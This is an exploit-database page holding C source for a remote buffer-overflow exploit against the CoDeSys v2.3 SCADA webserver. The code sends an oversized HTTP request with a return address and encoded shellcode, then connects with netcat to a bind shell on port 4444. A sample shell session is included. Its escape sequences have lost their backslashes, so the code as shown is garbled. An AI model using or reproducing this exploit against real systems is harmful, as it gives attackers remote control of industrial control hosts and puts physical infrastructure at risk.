[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CoDeSys SCADA v2.3 Remote Exploit
# Published : 2011-12-01
# Author :
# Previous Title : Java AtomicReferenceArray Type Violation Vulnerability
# Next Title : MS10-002 Internet Explorer Object Memory Use-After-Free


/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt

CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--

root@bt:~# ./codesys 192.168.1.36

CoDeSys v2.3 webserver Remote Exploit
 by SignalSEC Labs - www.signalsec.com

[+]Sending payload to SCADA system!

[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Program Files3S SoftwareCoDeSys V2.3visu>  

--snip--

*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define name "CoDeSys v2.3 webserver Remote Exploit"
#define PORT 8080
#define JUNK "A"

int main ( int argc, char *argv[] )
{

 
int sock, i, payload;

struct sockaddr_in dest_addr;

char *target = "target";

char request[1600], *ptr;


char ret[] = "x67x42xa7x71"; //ret - WINXP SP1 EN , mswsock.dll

char hellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34"
"x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38"
"x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d"
"x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48"
"x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56"
"x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46"
"x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34"
"x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31"
"x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a"
"x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41"
"x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d"
"x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36"
"x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c"
"x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56"
"x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a";

printf ("n%sn by SignalSEC Labs - www.signalsec.comn", name);

if (argc < 2) 
{
        printf ("nUsage: codesys [IP]n");
        exit (-1);
}

setenv (target, argv[1], 1);


memset (request, '', sizeof (request));
ptr = request;
strcat (request, "GET /");

for(i = 1; i < 776; i++){

	strcat (request, JUNK);
}

strcat (request, ret);
strcat (request, hellcode);
strcat (request, " HTTP/1.1");
strcat (request, "rn");


if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("nsocket errorn");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '', 8);

if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("nCouldnt connect to target!n");
        close (sock);
        exit (3);
        }

payload = (send (sock, ptr, strlen(request), 0));
if (payload == -1) {
        perror("nCan not send the payloadn");
        close (sock);
        exit(4);
        }
close (sock);
printf ("n[+]Sending payload to SCADA system!n");
sleep (1);
printf ("n[+]Connecting to port 4444 to get shell!n");
sleep (2);
system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");
exit (0);
}